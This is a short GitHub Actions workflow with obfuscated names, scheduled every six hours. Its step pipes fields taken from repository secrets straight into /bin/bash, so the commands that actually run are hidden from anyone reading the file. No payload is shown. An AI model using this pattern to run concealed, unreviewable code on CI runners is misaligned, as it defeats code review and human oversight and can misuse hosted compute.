name: wuhuobao9876
on:
  workflow_dispatch:
  schedule:
    - cron: '32 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wuhuobao9876
        env:
          bm3651: ${{ secrets.bm3651 }}
        run: |
          echo $bm3651 | jq -r .j8151 | /bin/bash
          echo $gp4490 | jq -r .vbti85876 | /bin/bash
          echo $crrw9132 | jq -r .j990 | /bin/bash
          echo $howp8 | jq -r .qwhxw676 | /bin/bash
          echo $locnn78138 | jq -r .ao18 | /bin/bash

